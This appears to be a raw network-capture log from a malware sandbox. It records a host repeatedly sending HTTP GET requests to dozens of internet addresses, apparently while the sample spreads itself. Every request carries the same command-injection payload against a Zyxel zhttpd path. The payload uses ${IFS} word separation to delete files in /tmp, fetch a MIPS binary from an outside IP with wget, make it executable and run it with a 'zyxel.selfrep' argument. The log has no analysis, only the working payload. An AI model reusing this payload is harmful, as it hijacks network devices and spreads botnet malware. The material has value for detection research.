                                                Jan 12, 2024 18:24:35.826894999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4285192.168.2.135791671.221.201.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826927900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4286192.168.2.1350600104.22.156.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826981068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4287192.168.2.135724065.14.244.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827035904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4288192.168.2.1345278142.19.157.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827065945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4289192.168.2.1349770156.185.178.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827128887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4290192.168.2.1348688130.202.214.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827166080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4291192.168.2.1350980208.17.124.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827212095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4292192.168.2.1344088156.50.243.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827253103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4293192.168.2.1352374176.223.101.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827299118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4294192.168.2.1357274184.236.4.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827330112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4295192.168.2.1345472121.235.3.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827389956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4296192.168.2.133634894.162.231.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827440023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4297192.168.2.1356674138.206.93.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827490091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4298192.168.2.135469246.11.72.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827538013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4299192.168.2.135635054.126.127.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827594042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4300192.168.2.1335522163.136.10.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827651024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4301192.168.2.1357462188.250.248.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827692032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4302192.168.2.135023092.181.72.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827727079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4303192.168.2.135873074.91.226.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827778101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4304192.168.2.135765632.60.75.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827831030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4305192.168.2.133290268.153.180.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827868938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4306192.168.2.1357936132.229.161.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827934980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4307192.168.2.134011645.11.207.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.827996969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4308192.168.2.133726479.98.74.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828026056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4309192.168.2.1357244168.152.16.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828049898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4310192.168.2.135259067.60.97.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828099012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4311192.168.2.1355484210.173.36.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828155041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4312192.168.2.136099666.234.213.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828191996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4313192.168.2.134954263.92.4.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828267097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4314192.168.2.133346065.137.52.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828325033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4315192.168.2.1358908204.6.30.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828361034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4316192.168.2.1352990116.198.85.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828412056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4317192.168.2.1339686132.147.199.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828447104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4318192.168.2.1337246156.72.70.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828514099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4319192.168.2.1340548140.146.1.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828550100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4320192.168.2.134517484.7.110.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828593016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4321192.168.2.135451666.238.205.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828649998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4322192.168.2.134611872.3.79.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828696012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4323192.168.2.1360830169.85.105.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828732014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4324192.168.2.1340228201.26.108.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828777075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4325192.168.2.1354390191.36.127.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828824997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4326192.168.2.135027072.56.156.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828902960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4327192.168.2.135818458.152.166.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.828964949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4328192.168.2.1354028143.30.137.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829015970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4329192.168.2.1345700132.85.212.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829082966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4330192.168.2.1352052131.62.127.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829128027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4331192.168.2.1348066118.131.18.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829164028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4332192.168.2.135427082.148.160.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829224110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4333192.168.2.1352396117.247.140.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829262018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4334192.168.2.133564885.252.43.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829308033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4335192.168.2.1345854151.77.62.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829359055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4336192.168.2.1350178174.146.167.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829406023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4337192.168.2.1336070128.131.165.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829462051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4338192.168.2.1342780179.183.175.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829502106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4339192.168.2.1360920133.21.225.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829549074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4340192.168.2.1338650211.168.124.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829597950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4341192.168.2.1359560219.81.163.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829653978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4342192.168.2.1354986221.212.233.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829679012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4343192.168.2.13533562.181.86.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829734087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4344192.168.2.133982082.32.171.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829787016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4345192.168.2.134944076.166.92.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829852104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4346192.168.2.1357138124.44.245.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829910040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4347192.168.2.133854049.85.87.84443
                                                TimestampBytes transferredDirectionData
